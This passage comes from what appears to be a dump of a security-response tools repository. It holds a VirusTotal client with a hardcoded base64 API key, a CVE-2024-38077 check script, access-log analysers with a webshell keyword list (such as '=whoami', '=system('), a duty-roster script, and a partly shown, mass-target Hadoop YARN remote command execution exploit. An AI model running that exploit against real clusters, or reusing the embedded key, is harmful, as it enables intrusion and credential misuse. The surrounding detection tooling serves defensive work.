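    'VT_APIKEY_B64',
    'MDMzZTFhMmFlMDcxZjg4MDBkNTU4YTk2ODcxN2MyNjc0ZjhlYjcyOGNmYjZiNDcwZDQ3MTNkZDc0NDYwMGZiNytjaGVucmFu',
)


class virustotal(object):
    '''Small client for the VirusTotal v2 HTTP API endpoints used below.'''

    def __init__(self, username='chenran'):
        '''Decode APIKEY and check that it was issued for *username*.

        Raises Exception("Wrong Username") when the user name stored in
        APIKEY differs from *username*.
        '''
        _decoded = base64.b64decode(APIKEY).split('+')
        self._key = _decoded[0]
        self._username = _decoded[-1]
        self._host = "www.virustotal.com"
        self._fields = [("apikey", self._key)]
        if self._username != username:
            raise Exception("Wrong Username")

    def _upload_check_file(self, _file):
        '''Upload *_file* to the file/scan endpoint and return the raw answer.

        Returns None when the file cannot be read or the upload fails.

        NOTE: this sends the file content to a third-party service, so the
        sample leaves the investigated host. Check that it holds no
        confidential data first, or query by hash with check_file(_hash=...).
        '''
        # Read from the path the caller gave. Only the multipart file name is
        # cut down to its basename, so local directory names are not sent.
        try:
            with open(_file, 'rb') as _handle:
                _content = _handle.read()
        except Exception as reason:
            print "上传文件错误"
            return None
        _file_struct = [("file", os.path.basename(_file), _content)]
        try:
            _json = postfile.post_multipart(self._host, "https://www.virustotal.com/vtapi/v2/file/scan", self._fields, _file_struct)
        except Exception as reason:
            print "获取文件报告错误"
            return None
        return _json

    def _file_rescan(self, _id):
        '''Request a rescan for one resource id, or for a list of them.

        A list is sent as one comma-separated "resource" value.
        Returns the raw response body, or None on any request error.
        '''
        if isinstance(_id, list):
            _string = ",".join(["%s" % sid for sid in _id])
        else:
            _string = str(_id)
        _parameters = {"resource": _string, "apikey": self._key}
        try:
            data = urllib.urlencode(_parameters)
            _request = urllib2.Request("https://www.virustotal.com/vtapi/v2/file/rescan", data)
            _response = urllib2.urlopen(_request)
            _json = _response.read()
        except Exception as reason:
            return None
        return _json

    def _fast_check(self, _file):
        '''Upload *_file* (falling back to a rescan) and return its sha256.

        Returns None when neither request produced a usable JSON answer.
        '''
        _json = self._upload_check_file(_file)
        if _json is None:
            return None
        if 'Error 400' in _json:
            # The md5 is only the lookup key handed to the rescan endpoint,
            # not an integrity check.
            with open(_file, 'rb') as _handle:
                _md5 = hashlib.md5(_handle.read()).hexdigest()
            _json = self._file_rescan(_md5)
            if _json is None:
                return None
        try:
            return simplejson.loads(_json)["sha256"]
        except (ValueError, KeyError, TypeError) as reason:
            return None

    def _upload_check_files(self, _file_list):
        '''Run _fast_check on every path in *_file_list*.

        Returns the list of results (sha256 or None per file), or None when
        the list is empty.
        '''
        if not _file_list:
            return None
        return [self._fast_check(_file) for _file in _file_list]

    def _get_report(self, _sha256):
        '''Fetch the file report for *_sha256*; returns the raw body or None.'''
        _url = "https://www.virustotal.com/vtapi/v2/file/report"
        _parameters = {"resource": _sha256, "apikey": self._key}
        try:
            _data = urllib.urlencode(_parameters)
            _request = urllib2.Request(_url, _data)
            _response = urllib2.urlopen(_request)
            _json = _response.read()
        except Exception as reason:
            return None
        return _json

    def check_file(self, _hash=None, _file=None):
        '''Print the detection summary for a file given by path or by hash.

        _file -- path of a local file; it is uploaded first (see the note on
                 _upload_check_file), then its sha256 report is fetched.
        _hash -- hash to look up without uploading anything.

        Returns 0 when neither argument is given, otherwise None.
        '''
        if _file is not None:
            self._fast_check(_file)
            try:
                with open(_file, 'rb') as _handle:
                    _sha256 = hashlib.sha256(_handle.read()).hexdigest()
            except IOError as reason:
                # The upload step has already reported the unreadable file.
                return None
            _json = self._get_report(_sha256)
        elif _hash is not None:
            _json = self._get_report(_hash)
        else:
            return 0
        # No body, or a body that is not JSON, means there is nothing to show.
        try:
            _json = json.loads(_json)
        except (TypeError, ValueError) as reason:
            print "获取文件报告错误"
            return None
        if 'Invalid' not in _json.get("verbose_msg", ""):
            positives = _json.get('positives', 0)
        else:
            positives = 0
        # A report without analysis results carries no "scans" entry.
        _scans = _json.get('scans', {})
        _list = [x for x in _scans if _scans[x]['detected']]
        print "******************************************"
        print "检测时间: %s"%str(_json.get("scan_date"))
        print "报毒数量: %s"%positives
        print "报毒引擎: %s"%str(_list)
        print "引擎总数: %s"%_json.get("total")
        print "******************************************"

    def _print_ioc_summary(self, _json):
        '''Print how many detected samples, detected URLs and resolutions
        the decoded report *_json* lists.'''
        try:
            resolv_domains = len(_json['resolutions'])
        except Exception as reason:
            resolv_domains = 0
        samples = 0
        urls = 0
        for key in _json.keys():
            # Only "detected_*" lists count; "undetected_*" contains the same
            # substring and is skipped explicitly.
            if 'detected' not in key or 'undetected' in key:
                continue
            if 'samples' in key:
                for stuff in _json[key]:
                    if stuff["positives"] > 0:
                        samples += 1
            if 'urls' in key:
                for stuff in _json[key]:
                    try:
                        if stuff['positives'] > 0:
                            urls += 1
                    except Exception as reason:
                        # Entry is a positional list instead of a dict.
                        if int(stuff[2]) > 0:
                            urls += 1
        print "******************************************"
        print "检测时间: %s"%str(datetime.datetime.now()).split(".")[0]
        print "关联样本: %s"%str(samples)
        print "关联连接: %s"%str(urls)
        print "关联域名: %s"%str(resolv_domains)
        print "******************************************"

    def ioc_check(self, ioc, ioctype='domain'):
        '''Look up *ioc* and print a summary of what VirusTotal relates to it.

        ioctype -- 'url', 'domain' or 'ip'; any other value is rejected.

        The lookup is tried as a GET first; for 'url' a failed GET is retried
        as a POST. Always returns None.
        '''
        _dict = {
            "url": "https://www.virustotal.com/vtapi/v2/url/scan",
            "domain": "https://www.virustotal.com/vtapi/v2/domain/report",
            "ip": "https://www.virustotal.com/vtapi/v2/ip-address/report",
        }
        if ioctype not in _dict:
            print "类型不对,请检查"
            # Stop here: an unknown type has no endpoint to query.
            return None
        _parameters = {ioctype: ioc, 'apikey': self._key}
        _url = _dict[ioctype]
        try:
            # NOTE: the API key travels in the query string of this GET, so it
            # can show up in proxy or web-gateway logs along the path.
            _response = urllib2.urlopen('%s?%s'%(_url, urllib.urlencode(_parameters))).read()
            _json = json.loads(_response)
        except Exception as reason:
            if ioctype != 'url':
                return None
            try:
                _data = urllib.urlencode(_parameters)
                _request = urllib2.Request(_url, _data)
                _response = urllib2.urlopen(_request)
                _json = json.loads(_response.read())
                self._print_ioc_summary(_json)
            except Exception as reason:
                print reason
            return None
        self._print_ioc_summary(_json)


if __name__ == "__main__":
    parser = OptionParser()
    parser.add_option("-f", "--file", dest="file", help="file to upload and check")
    parser.add_option("-a", "--addr", dest="addr", help="IP address to look up")
    parser.add_option("-d", "--domain", dest="domain", help="domain to look up")
    parser.add_option("-u", "--url", dest="url", help="URL to look up")
    (options, args) = parser.parse_args()
    obj = virustotal()
    # The first option that was given wins; the others are ignored.
    if options.file not in [None, ""]:
        obj.check_file(_file=options.file)
        sys.exit(0)
    if options.addr not in [None, ""]:
        obj.ioc_check(options.addr, "ip")
        sys.exit(0)
    if options.domain not in [None, ""]:
        obj.ioc_check(options.domain, "domain")
        sys.exit(0)
    if options.url not in [None, ""]:
        obj.ioc_check(options.url, "url")
        sys.exit(0)
-------------------------------------------------------------------------------- /Emergency/Windows/CVE-2024-38077_Check.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | setlocal 3 | 4 | set "serviceName=TermServLicensing" 5 | for /f "tokens=4" %%i in ('sc query %serviceName% ^| findstr /i "STATE"') do set serviceState=%%i 6 | 7 | if "%serviceState%"=="" ( 8 | echo [Must Be Secure] Service "%serviceName%" does not exist 9 | ) else ( 10 | echo [May Be Vulnerable] Service "%serviceName%" , Status [%serviceState%] 11 | ) 12 | endlocal 13 | exit /b 0 14 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 挖洞的土拨鼠 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 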
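IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 |
--------------------------------------------------------------------------------
/LogTools/AccessLogAnylast.py:
--------------------------------------------------------------------------------
# -*- coding:utf-8 -*-

from core.AccessApi import *
from core.AccessCount import *
from core.AccessDetail import *
from core.AccessFreeze import *
from core.AccessWebshell import *
from optparse import OptionParser


__author__ = "wechat:cr1914518025"
__version__ = """
AccessLogAnylast V1.0.1
python AccessLogAnylast.py -parameter-key [parameter-value]
"""

# Command-line front end: collect the access-log files, then run exactly one
# of the analyses (count, detail, webshell scan, payload search) over each.
if __name__ == "__main__":
    parser = OptionParser()
    parser.add_option("-f", "--floder", dest="filepath", help="access log file path")
    parser.add_option("-t", "--time", dest="accesstime", help="set search time")
    parser.add_option("-d", "--date", dest="accessdate", help="set search date")
    parser.add_option("-c", "--count", action='store_true', dest="count", help="show count information")
    parser.add_option("-p", "--payload", dest="payload", help="set search payload")
    parser.add_option("-a", "--address", dest="ipaddress", help="set search ipaddress")
    parser.add_option("-v", "--version", action='store_true', dest="version", help="show document")
    parser.add_option("-i", "--detail", action='store_true', dest="detail", help="show detail")
    parser.add_option("-s", "--shell", action='store_true', dest="webshell", help="show suspicious webshell")
    parser.add_option("-g", "--ipflag", dest="ipposition", help="ip position in logfile")
    parser.add_option("-n", "--name", dest="filename", help="filename flag")
    (options, args) = parser.parse_args()
    if options.version:
        print __version__
        exit(0)
    # Defaults for options that were not given. The file-name default has to be
    # an assignment: a comparison here leaves filename as None.
    if options.filename is None:
        options.filename = "access"
    if options.ipposition is None:
        options.ipposition = "1"
    # filepath=None makes GetAllAccessLogFile fall back to the working directory.
    GetAllAccessLogFile(filepath=options.filepath, filename=options.filename)
    mylogfilelist = AccessLogFileList

    if options.count:
        for filename in mylogfilelist:
            if options.accesstime is not None:
                GetAccessIPListByTime(filename, accesstime=options.accesstime, ipflag=options.ipposition)
            elif options.accessdate is not None:
                GetAccessIPListByDate(filename, date=options.accessdate, ipflag=options.ipposition)
            else:
                GetAccessIPList(filename, ipflag=options.ipposition)
        exit(0)

    if options.detail:
        for filename in mylogfilelist:
            if options.ipaddress is None:
                GetAccessLogDetail(filename)
            elif options.accesstime is not None:
                GetAccessLogDetailByIPANDTime(filename, ipaddress=options.ipaddress, acstime=options.accesstime)
            elif options.accessdate is not None:
                GetAccessLogDetailByIPANDDate(filename, ipaddress=options.ipaddress, date=options.accessdate)
            else:
                GetAccessLogDetailByIP(filename, ipaddress=options.ipaddress)
        exit(0)

    if options.webshell:
        for filename in mylogfilelist:
            WebShellScan(filename)
        exit(0)

    if options.payload is not None:
        for filename in mylogfilelist:
            GetFreezeWebAttack(filename, options.payload)
        exit(0)
-------------------------------------------------------------------------------- /LogTools/core/AccessApi.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | import os 4 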
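|

# Module-level state and helper functions shared by the LogTools modules.
AccessLogFileList = []


def GetWorkPath():
    '''Return the current working directory with a trailing "/".'''
    return str(os.getcwd())+'/'


def GetAllAccessLogFile(filepath=None,filename="access"):
    '''Append every matching log file below *filepath* to AccessLogFileList.

    filepath -- directory to walk; the working directory when None.
    filename -- substring the lower-cased file name must contain.

    Any file whose name contains "py" is skipped (that also excludes names
    such as "copy_access.log").
    '''
    global AccessLogFileList
    rootdir = GetWorkPath() if filepath is None else filepath
    for parents,dirs,filenames in os.walk(rootdir):
        for logfilename in filenames:
            if filename in logfilename.lower() and 'py' not in logfilename:
                # Join with the directory the file was found in, so files in
                # sub-directories (or a root given without a trailing slash)
                # get a path that exists.
                AccessLogFileList.append(os.path.join(parents,logfilename))


def TimeFormat(accesstime,timezone=None):
    '''Convert "YYYY-MM-DD[-time]" into the "DD/Mon/YYYY:time" log notation.

    The part after the third "-" is copied after the colon; when it is
    missing the result ends with ":".
    '''
    monthlist = {"01":"Jan","02":"Feb","03":"Mar","04":"Apr","05":"May","06":"Jun","07":"Jul","08":"Aug","09":"Sep","10":"Oct","11":"Nov","12":"Dec"}
    accesstimelist = accesstime.split("-")
    year = accesstimelist[0]
    month = accesstimelist[1]
    day = accesstimelist[2]
    timedetail = accesstimelist[3] if len(accesstimelist) > 3 else ''
    if timezone is not None:
        # NOTE(review): the "%s" in these suffixes is never filled in, so a
        # literal "+%s00" / "-%s00" ends up in the search string. The expected
        # form of *timezone* is not visible here; confirm before changing.
        if 'e' in timezone:
            timezone = '+%s00'
        elif 'w' in timezone:
            timezone = '-%s00'
        else:
            timezone = None
    if timezone is not None:
        return '%s/%s/%s:%s %s'%(day,monthlist[str(month)],year,timedetail,timezone)
    return '%s/%s/%s:%s'%(day,monthlist[str(month)],year,timedetail)
--------------------------------------------------------------------------------
/LogTools/core/AccessCount.py:
--------------------------------------------------------------------------------
# -*- coding:utf-8 -*-

import os
from AccessApi import *


def _RankAddresses(filename,ipflag,pattern=None,quiet_when_empty=False):
    '''Print the values of log field *ipflag*, ranked by number of occurrences.

    filename -- access log to read.
    ipflag   -- 1-based position of the source-address field (int or digits).
    pattern  -- when given, only lines that grep matches against it count.
    quiet_when_empty -- print nothing when the pipeline produced no output.

    Raises ValueError when *ipflag* is not a non-negative integer.
    '''
    import pipes  # local import: quote() for shell words (Python 2)

    position = int(ipflag)
    if position < 0:
        raise ValueError("ipflag must not be negative")
    # The command line is run by a shell through os.popen. File name and
    # pattern are therefore quoted as single literal words, and the field
    # number is forced to an integer because it is pasted into the awk program.
    stages = ["cat -- %s"%pipes.quote(filename)]
    if pattern is not None:
        stages.append("grep -e %s"%pipes.quote(pattern))
    stages.append("awk '{print $%d}'"%position)
    stages.append("sort -r | uniq -c | sort -r")
    result = os.popen(" | ".join(stages)).read()
    if quiet_when_empty and result == '':
        return
    # Group the addresses by their hit count: {count: [address, ...]}.
    AccessListIP = {}
    for line in result.split('\n'):
        line = line.lstrip()
        if line == "":
            continue
        stuff = line.split(' ')
        AccessListIP.setdefault(int(stuff[0]),[]).append(stuff[1])
    print "日志文件:%s"%filename
    for index,value in enumerate(sorted(AccessListIP.keys(),reverse=True)):
        for ip in AccessListIP[value]:
            print "排名:%s 访问源地址:%s 访问次数:%s"%(index+1,ip,value)


def GetAccessIPList(filename,ipflag='1'):
    '''Rank the source addresses over the whole of *filename*.'''
    _RankAddresses(filename,ipflag)


def GetAccessIPListByTime(filename,accesstime,ipflag='1',timezone=None):
    '''Rank the source addresses of the lines that carry *accesstime*.

    *accesstime* is given as "YYYY-MM-DD[-time]" and converted by TimeFormat.
    '''
    _RankAddresses(filename,ipflag,TimeFormat(accesstime,timezone))


def GetAccessIPListByDate(filename,date,ipflag='1'):
    '''Rank the source addresses of the lines dated *date* ("YYYY-MM-DD").

    Prints nothing when no line matches.
    '''
    _RankAddresses(filename,ipflag,TimeFormat(date).split(":")[0],quiet_when_empty=True)
--------------------------------------------------------------------------------
/LogTools/core/AccessDetail.py:
--------------------------------------------------------------------------------
# -*- coding:utf-8 -*-

import os
from AccessApi import *

# Layout of one printed log entry.
_DETAIL_TEMPLATE = """
***************************************************************************************************
访问源IP地址:%s
访问时间:%s
请求方法:%s
访问行为:%s
响应状态:%s
站点信息:%s
客户端:%s
***************************************************************************************************
"""


def _Printable(text):
    '''Return *text* with control characters shown as \\xNN escapes.

    Request lines and user agents are written by whoever sent the request, so
    they are not echoed raw to the analyst's terminal.
    '''
    shown = []
    for char in text:
        code = ord(char)
        shown.append('\\x%02x'%code if code < 32 or code == 127 else char)
    return ''.join(shown)


def _PrintEntries(filename,ipaddress=None,marker=None):
    '''Print every entry of *filename* that passes the optional filters.

    ipaddress -- substring that the first field must contain.
    marker    -- substring (time or date) that the line must contain.

    Lines are split on single spaces; lines with fewer than nine fields
    (blank lines included) are skipped.
    '''
    print "文件:%s"%filename
    with open(filename,'r') as fr:
        for line in fr:
            informationlist = line.split(" ")
            if len(informationlist) < 9:
                continue
            ip = informationlist[0]
            if ipaddress is not None and ipaddress not in ip:
                continue
            if marker is not None and marker not in line:
                continue
            accesstime = informationlist[3].split('[')[-1].split(']')[0]
            method = informationlist[5][1:]
            action = informationlist[6]
            statuscode = informationlist[8]
            website = informationlist[10] if len(informationlist) > 10 else '-'
            # Fields 11..24 are joined back together; the final character
            # (line end or closing quote) is dropped.
            useragent = ' '.join(informationlist[11:25])[:-1]
            values = (ip,accesstime,method,action,statuscode,website,useragent)
            print _DETAIL_TEMPLATE%tuple([_Printable(value) for value in values])


def GetAccessLogDetail(filename):
    '''Print every entry of *filename*.'''
    _PrintEntries(filename)


def GetAccessLogDetailByIP(filename,ipaddress):
    '''Print the entries whose first field contains *ipaddress*.

    The match is a substring match, so "10.0.0.1" also selects "10.0.0.12";
    the address printed is the one found in the log line.
    '''
    _PrintEntries(filename,ipaddress=ipaddress)


def GetAccessLogDetailByIPANDTime(filename,ipaddress,acstime):
    '''Print the entries matching *ipaddress* that carry time *acstime*
    ("YYYY-MM-DD[-time]", converted by TimeFormat).'''
    _PrintEntries(filename,ipaddress=ipaddress,marker=TimeFormat(acstime))


def GetAccessLogDetailByIPANDDate(filename,ipaddress,date):
    '''Print the entries matching *ipaddress* that are dated *date*
    ("YYYY-MM-DD").'''
    _PrintEntries(filename,ipaddress=ipaddress,marker=TimeFormat(date).split(":")[0])
--------------------------------------------------------------------------------
/LogTools/core/AccessFreeze.py:
--------------------------------------------------------------------------------
# -*- coding:utf-8 -*-

import os
from AccessApi import *


def GetFreezeWebAttack(filename,payload):
    '''Print the lines of *filename* that grep matches against *payload*,
    de-duplicated and preceded by their count, least frequent first.'''
    import pipes  # local import: quote() for shell words (Python 2)

    # Both values are pasted into a shell command line, so each is quoted as
    # one literal word; "-e" keeps a payload that starts with "-" from being
    # read as a grep option.
    command = "cat -- %s | grep -e %s | sort -r | uniq -c| sort -n"%(pipes.quote(filename),pipes.quote(payload))
    result = os.popen(command)
    print result.read()
--------------------------------------------------------------------------------
/LogTools/core/AccessWebshell.py:
--------------------------------------------------------------------------------
# -*- coding:utf-8 -*-

import os
import sys
from AccessApi import *
sys.path.append("../")
from settings.settings import *


# Substrings that mark a requested path as suspicious. They are compared with
# the lower-cased request path.
# NOTE(review): the path is one space-separated log field, so the entries that
# end in a space ("php ", "asp ", ...) cannot match as written.
keywords = [
    "ghost",
    "gh0st",
    "=eval",
    "evil",
    "asp;",
    "php;",
    "jsp;",
    "aspx;",
    "jspx;",
    "php3;",
    "php4;",
    "php5;",
    ".asp/",
    ".aspx/",
    ".jsp/",
    ".jspx/",
    ".php/",
    "jpg/",
    "jpeg/",
    "png/",
    "php%00",
    "asp%00",
    "jsp%00",
    "aspx%00",
    "jspx%00",
    "php ",
    "asp ",
    "jsp ",
    "aspx ",
    "jspx ",
    ".txt/",
    "=system(",
    ".jsp.",
    ".php.",
    ".php3.",
    ".php4.",
    ".php5.",
    ".jspx.",
    ".asp.",
    ".aspx.",
    "cmd",
    "phpinfo",
    "=whoami",
    "=id",
    "=bash",
    "=ls",
    "..",
    # Backslash escaped: an unescaped "\t" is a TAB and the entry never matches.
    "s=/index/\\think",
    "call_user_func_array",

]


def KeywordCheck(string):
    '''Return (True, keyword) for the first keyword found in *string*
    (compared in lower case), else (False, None).'''
    lowered = string.lower()
    for word in keywords:
        if word in lowered:
            return (True,word)
    return (False,None)


def GetPageAccessModel(filename):
    '''Build per-page access statistics from the log *filename*.

    Returns (accessModel, keywordPage):
    accessModel -- {page: {source address: number of requests}}
    keywordPage -- [(page, keyword)] for each request whose path hit a keyword.

    Lines are split on single spaces; field 0 is taken as the source address
    and field 6 as the requested page. Shorter lines are skipped.
    '''
    accessModel = {}
    keywordPage = []
    with open(filename,'r') as fr:
        for line in fr:
            informationlist = line.split(" ")
            if len(informationlist) < 7:
                continue
            accesspage = informationlist[6]
            ret = KeywordCheck(accesspage)
            if ret[0]:
                keywordPage.append((accesspage,ret[1]))
            ip = informationlist[0]
            # Count per (page, address). The lookup has to be made in the
            # page's own table, otherwise every count is reset on each hit.
            pagehits = accessModel.setdefault(accesspage,{})
            pagehits[ip] = pagehits.get(ip,0) + 1
    return accessModel,keywordPage


def GetSuspiciousPage(accessModel):
    '''Print the pages that few addresses requested and that were requested rarely.

    Pages are ordered by (distinct addresses, total requests) ascending; output
    stops after eleven pages or at the first page above WebShellScanAccessIPCount
    or WebShellScanAccessCount.
    '''
    PageAccessModel = []
    for key in accessModel:
        ipcount = len(accessModel[key].keys())
        accesscount = sum(accessModel[key].values())
        PageAccessModel.append({"page":key,"ipcount":ipcount,"accesscount":accesscount})
    resultlist = sorted(PageAccessModel ,key = lambda x:(x['ipcount'],x['accesscount']),reverse=False)
    for index,item in enumerate(resultlist):
        if int(index) > 10 or item["ipcount"] > WebShellScanAccessIPCount or item["accesscount"] > WebShellScanAccessCount:
            break
        print "可疑页面:%s"%item["page"],"可疑原因:访问率低"

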
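def WebShellScan(filename):
    '''Print the suspicious pages found in the access log *filename*.

    First the pages whose path contains a keyword, then the pages reported by
    GetSuspiciousPage.
    '''
    pagemodel,keywordpages = GetPageAccessModel(filename)
    for page in keywordpages:
        print "可疑页面:",page[0]," 可疑原因:",page[1]
    GetSuspiciousPage(pagemodel)
--------------------------------------------------------------------------------
/LogTools/core/__init__.py:
--------------------------------------------------------------------------------
__all__ = [
    "AccessApi",
    "AccessCount",
    "AccessDetail",
    "AccessFreeze",
    "AccessWebshell",
]
--------------------------------------------------------------------------------
/LogTools/settings/__init__.py:
--------------------------------------------------------------------------------
__all__ = [
    "settings"
]
--------------------------------------------------------------------------------
/LogTools/settings/settings.py:
--------------------------------------------------------------------------------
# Upper bounds used by the webshell scan of the access logs.
WebShellScanAccessIPCount = 5
WebShellScanAccessCount = 50
--------------------------------------------------------------------------------
/ManagementTools/WorkSchedule.py:
--------------------------------------------------------------------------------
import sys
import datetime
import chinese_calendar as calendar


banner = """
######################################################################################
# 欢迎使用 XXXXXXXXXXXXXXXXXXXXXX 节假日值班自动排班程序V2.0 #
# 作者:b0b@c #
# 支持福利假期设定 #
######################################################################################
"""
# People to put on the rota; filled in by the interactive prompt.
worker_list = []
# Label for each holiday name, and for Saturday ("5") and Sunday ("6").
holiday_dict = {
    "New Year's Day":"元旦假期",
    "Spring Festival":"春节假期",
    "Tomb-sweeping Day":"清明假期",
    "Labour Day": "五一假期",
    "Dragon Boat Festival": "端午假期",
    "Mid-autumn Festival": "中秋假期",
    "National Day": "国庆假期",
    "5":"周六休假",
    "6":"周日休假"
}
# Extra company holidays as (date, label) tuples.
qax_holidays = []


def set_qax_holidays(day_string):
    """Add the extra holiday *day_string* ("YYYY-MM-DD") to qax_holidays.

    Returns True when the date was added, False when it could not be parsed.
    """
    global qax_holidays
    try:
        parts = day_string.split("-")
        extra_day = datetime.date(int(parts[0]), int(parts[1]), int(parts[2]))
    except Exception as error:
        return False
    qax_holidays.append((extra_day, "福利休假"))
    return True


def get_holiday_name(day):
    """Return the label for *day*: its holiday name, else its weekday entry.

    Raises KeyError when neither is present in holiday_dict.
    """
    name = calendar.get_holiday_detail(day)[1]
    if name is None:
        name = str(day.weekday())
    return holiday_dict[name]


def get_holidays(year):
    """Return the sorted (date, label) list of all days off in *year*.

    The calendar's holidays are combined with the de-duplicated entries of
    qax_holidays.
    """
    global qax_holidays
    qax_holidays = list(set(qax_holidays))
    first_day = datetime.date(year, 1, 1)
    last_day = datetime.date(year, 12, 31)
    holidays = [(day, get_holiday_name(day))
                for day in calendar.get_holidays(start=first_day, end=last_day)]
    holidays.extend(qax_holidays)
    holidays.sort()
    return holidays


def work_schedule(year):
    """Write "<year>_OnDuty_Table.csv" with one on-duty person per day off.

    People are taken from worker_list in turn. Weekend days are marked as
    on-site duty, all other days as remote duty.

    Raises ValueError when worker_list is empty.
    """
    if not worker_list:
        raise ValueError("worker_list is empty")
    holidays = get_holidays(year)
    with open("%s_OnDuty_Table.csv" % str(year), 'w') as file_writer:
        file_writer.writelines("值班日期,假期名称,值班方式,值班人\n")
        for index, holiday in enumerate(holidays):
            day_date = str(holiday[0])
            day_name = holiday[1]
            work_style = "公司值班" if day_name in ["周六休假", "周日休假"] else "远程值班"
            # Rotate over however many people were entered; a fixed modulus
            # fails for a shorter list and never reaches the end of a longer one.
            worker_name = worker_list[index % len(worker_list)]
            stuff = "%s,%s,%s,%s\n" % (day_date, day_name, work_style, worker_name)
            file_writer.writelines(stuff)


68 | if __name__ == "__main__": 69 | year = 2025 70 | print(banner) 71 | try: 72 | year = int(sys.argv[1]) 73 | except Exception as error: 74 | print("[-] 您输入的年份错误或官方尚未给出法定假期安排") 75 | sys.exit(0) 76 | while(True): 77 | day = input("[*] 请输入福利假日安排(按天输入一次一天),例如2025-02-06,不再继续请输入0:") 78 | if day == "0": 79 | break 80 | result = set_qax_holidays(day) 81 | if not result: 82 | print("[-] 输入错误,请重新输入") 83 | else: 84 | print("[+] 已添加,请输入下一天:") 85 | while(True): 86 | workers = input("[*] 请输入排班人员(姓名编号,逗号分割),例如 xx23,xx02,xxxx,...:") 87 | try: 88 | worker_list = workers.split(",") 89 | worker_list = list(set(worker_list)) 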
90 | try: 91 | worker_list.remove("") 92 | except Exception as error: 93 | pass 94 | break 95 | except Exception as error: 96 | print("[-] 输入错误,请重新输入") 97 | continue 98 | try: 99 | work_schedule(year) 100 | print("[+] 排班完成,请在本目录下查看%s_OnDuty_Table.csv文件" % str(year)) 101 | except Exception as error: 102 | print("[-] 发生错误: %s" %str(error)) 103 | 104 | -------------------------------------------------------------------------------- /POCS/HadoopYarnRCE.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import json 3 | import time 4 | import random 5 | import urllib3 6 | import datetime 7 | import requests 8 | import threading 9 | from optparse import OptionParser 10 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 11 | 12 | 13 | def write_log(content) -> None: 14 | timestamp: str = str(datetime.datetime.fromtimestamp(time.time())) 15 | with open("./running.log", 'a') as file_writer: 16 | content: str = str(content).replace("\n", "") 17 | message: str = "[%s] %s\n" % (timestamp, content) 18 | try: 19 | file_writer.write(message) 20 | except Exception as error: 21 | err_message: str = "[-][%s]Write log error!" % timestamp 22 | file_writer.write(err_message) 23 | 24 | 25 | class HadoopYarnRCEVulnerabilityExploiter(threading.Thread): 26 | def __init__(self, target: str, command: str): 27 | threading.Thread.__init__(self) 28 | self.target: str = target if target.endswith("/") else target + "/" 29 | self.command = command 30 | write_log("[-] Start To Exploit Hadoop Yarn RCE Vulnerability, Target is (%s)!" 
% str(self.target)) 31 | 32 | def run(self): 33 | request1_url: str = self.target + "ws/v1/cluster/apps/new-application" 34 | app_id: str = "" 35 | try: 36 | response1: requests.Response = requests.post(request1_url, verify=False, timeout=3) 37 | app_id = json.loads(response1.text)["application-id"] 38 | except Exception as error: 39 | write_log("[-] Error : %s" % str(error)) 40 | return 41 | if app_id == "": 42 | write_log("[-] Get Application ID error!") 43 | return 44 | app_name: str = "hello-" + str(random.randint(100, 500)) 45 | request2_url: str = self.target + "ws/v1/cluster/apps" 46 | data = { 47 | "application-id": app_id, 48 | "application-name": app_name, 49 | 'am-container-spec': { 50 | 'commands': { 51 | 'command': self.command, 52 | }, 53 | }, 54 | 'application-type': 'YARN', 55 | } 56 | try: 57 | response2: requests.Response = requests.post(request2_url, json=data, verify=False, timeout=3) 58 | print("[+] Target %s exploit Done!" % str(self.target) ) 59 | except Exception as error: 60 | write_log("[-] Error : %s" % str(error)) 61 | return 62 | 63 | 64 | class HadoopYarnRCEScannerCreater(object): 65 | def __init__(self, command: str, target: str, target_file: str = None, thread_count: int = 10): 66 | self.target_list: list = [] 67 | self.command = command 68 | self.thread_count: int = thread_count 69 | self.thread_size: int = 0 70 | self.thread_list: list = [] 71 | # start to handle target file 72 | if target_file is not None: 73 | try: 74 | with open(target_file, 'r') as file_reader: 75 | for line in file_reader: 76 | line = line.split("\n")[0].split("\r")[0] 77 | self.target_list.append(line) 78 | except Exception as error: 79 | print("[-] Get targets information error!") 80 | write_log(error) 81 | # start to handle target 82 | if target is not None: 83 | self.target_list.append(target) 84 | print("[+] Get targets finished!") 85 | 86 | def run(self) -> None: 87 | """Running verify functions with multi-thread!""" 88 | if len(self.target_list) <= 0: 
